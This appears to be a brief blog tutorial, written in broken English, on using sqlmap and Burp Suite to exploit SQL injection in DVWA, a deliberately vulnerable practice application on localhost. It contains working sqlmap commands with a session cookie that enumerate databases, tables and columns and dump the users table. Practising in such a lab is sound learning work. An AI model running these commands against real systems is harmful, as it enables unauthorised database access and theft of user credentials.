On this time, I will pour what I learn in these afternoon namely about how to using sqlmap.
OK, lets start. The target i'm using DVWA (is an web application for pentest).
- Please activate first apache service and MySQL service on your system
- Open mantra web browser then type the url http://localhost/dvwa to open DVWA
- Set the proxy first and change HOST ip address to localhost and port:8080
- Then open the burp suite
- Login using username : admin password : password, then select SQL Injection. Now type (') in form and then click submit
- we will found error like following :
The errors above is a vulnerability, so we will more than easy to continue to next step.
- Open the burp suite again and see what is captured by the burp suite
- Now open sqlmap then type the command : ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=%27&Submit=Submit#" --cookie "security=low; PHPSESSID=drrnnb0io551k8gbijtr5gumi5" --risk=3 --threads=9 --level=5 --dbs
result : view the database
- Continue open the database to see the tables, column , row, etc
#See the tables
./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "PHPSESSID=drrnnb0io551k8gbijtr5gumi5" -D dvwa --tables
#See the columns
./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=%27&Submit=Submit#" --cookie "security=low; PHPSESSID=drrnnb0io551k8gbijtr5gumi5" -D dvwa --columns
#See the file
./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "PHPSESSID=drrnnb0io551k8gbijtr5gumi5" -D dvwa -T users --dump
Done.
No comments:
Post a Comment